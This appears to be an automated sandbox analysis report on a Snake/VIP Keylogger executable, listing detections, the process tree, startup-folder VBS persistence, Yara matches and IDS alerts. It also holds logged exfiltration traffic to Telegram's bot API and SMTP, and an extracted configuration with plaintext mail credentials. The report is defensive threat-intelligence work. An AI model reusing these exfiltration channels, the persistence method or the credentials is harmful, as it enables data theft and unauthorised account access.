
Windows Analysis Report
RubzLi27lr.exe

Overview

General Information

Sample name: RubzLi27lr.exe (renamed because the original name is a hash value)
Original sample name: eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8.exe
Analysis ID: 1587901
MD5: 44f0ea32a5acf017acf1d2a595c615f1
SHA1: ef36981f3271cf8c1a4b16a86b3d5f232337bb93
SHA256: eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RubzLi27lr.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
    • spadixes.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
      • RegSvcs.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\RubzLi27lr.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4232 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • spadixes.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" MD5: 44F0EA32A5ACF017ACF1D2A595C615F1)
      • RegSvcs.exe (PID: 2136 cmdline: "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2e13a:$a1: get_encryptedPassword
  • 0x2e457:$a2: get_encryptedUsername
  • 0x2df4a:$a3: get_timePasswordChanged
  • 0x2e053:$a4: get_passwordField
  • 0x2e150:$a5: set_encryptedPassword
  • 0x2f80a:$a7: get_logins
  • 0x2f76d:$a10: KeyLoggerEventArgs
  • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
3.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2e13a:$a1: get_encryptedPassword
  • 0x2e457:$a2: get_encryptedUsername
  • 0x2df4a:$a3: get_timePasswordChanged
  • 0x2e053:$a4: get_passwordField
  • 0x2e150:$a5: set_encryptedPassword
  • 0x2f80a:$a7: get_logins
  • 0x2f76d:$a10: KeyLoggerEventArgs
  • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hooking | ditekSHen | matched strings:
  • 0x2ed7f:$s1: UnHook
  • 0x2ed86:$s2: SetHook
  • 0x2ed8e:$s3: CallNextHook
  • 0x2ed9b:$s4: _hook
8.2.spadixes.exe.3fd0000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
8.2.spadixes.exe.3fd0000.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", ProcessId: 4232, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 3.130.71.34, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6108, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49871
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs", ProcessId: 4232, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe, ProcessId: 6568, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T19:10:47.478879+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:51.087271+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49742 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:53.368242+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49760 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:57.116679+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49788 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:59.642439+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49808 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:02.891207+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49833 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:04.124384+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49844 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:07.926395+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49876 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:10.509150+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49896 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T19:10:45.694316+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:46.897347+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:49.225489+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49719 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:50.491230+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49736 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:01.459977+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49820 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:02.319252+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49820 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:03.584907+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49838 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T19:11:00.597825+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49814 | 149.154.167.220 | 443 | TCP
2025-01-10T19:11:12.687611+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49913 | 149.154.167.220 | 443 | TCP


AV Detection

Source: RubzLi27lr.exe | Avira: detected
Source: http://mail.acadental.com | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Avira: detection malicious, Label: HEUR/AGEN.1319493
Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source: 8.2.spadixes.exe.3fd0000.1.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | ReversingLabs: Detection: 68%
Source: RubzLi27lr.exe | Virustotal: Detection: 68%
Source: RubzLi27lr.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Joe Sandbox ML: detected
Source: RubzLi27lr.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: RubzLi27lr.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49826 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49913 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: spadixes.exe, 00000002.00000003.2176143438.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.2174741374.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336964196.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000008.00000003.2336545567.00000000041C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00B1DBBE
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AEC2A2 FindFirstFileExW, 0_2_00AEC2A2
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B268EE FindFirstFileW,FindClose, 0_2_00B268EE
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00B2698F
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00B1D076
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00B1D3A9
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00B29642
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00B2979D
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00B29B2B
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B25C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00B25C97
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0094DBBE
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0091C2A2 FindFirstFileExW, 2_2_0091C2A2
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_009568EE FindFirstFileW,FindClose, 2_2_009568EE
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_0095698F
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0094D076
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0094D3A9
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00959642
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0095979D
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00959B2B
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00955C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00955C97
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 029DF45Dh 3_2_029DF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 029DF45Dh 3_2_029DF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 029DF45Dh 3_2_029DF52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 029DFC19h 3_2_029DF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FE959h 3_2_064FE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F31E0h 3_2_064F2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F0D0Dh 3_2_064F0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F1697h 3_2_064F0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F2C19h 3_2_064F2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_064F0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FE0A9h 3_2_064FDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FF209h 3_2_064FEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FCF49h 3_2_064FCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FD7F9h 3_2_064FD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F31E0h 3_2_064F2DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FE501h 3_2_064FE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FEDB1h 3_2_064FEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FF661h 3_2_064FF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_064F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_064F0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FFAB9h 3_2_064FF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FD3A1h 3_2_064FD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064F31E0h 3_2_064F310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 064FDC51h 3_2_064FD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0158F45Dh 9_2_0158F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0158F45Dh 9_2_0158F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0158FC19h 9_2_0158F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9E501h 9_2_06A9E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A90D0Dh 9_2_06A90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A91697h 9_2_06A90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A931E0h 9_2_06A92DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A92C19h 9_2_06A92968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9E959h 9_2_06A9E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9E0A9h 9_2_06A9DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9F661h 9_2_06A9F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9EDB1h 9_2_06A9EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9F209h 9_2_06A9EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9CF49h 9_2_06A9CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9D3A1h 9_2_06A9D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9FAB9h 9_2_06A9F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06A90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9DC51h 9_2_06A9D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A931E0h 9_2_06A92DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A931E0h 9_2_06A9310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06A9D7F9h 9_2_06A9D550

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49814 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49913 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.6:49871 -> 3.130.71.34:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (repeated 9 times)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org (repeated 9 times)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
